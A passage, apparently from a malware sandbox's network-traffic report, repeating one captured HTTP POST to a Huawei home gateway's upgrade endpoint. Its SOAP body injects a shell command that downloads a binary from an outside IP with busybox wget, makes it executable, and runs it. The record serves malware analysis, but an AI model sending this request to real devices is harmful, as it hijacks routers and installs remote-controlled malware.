HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
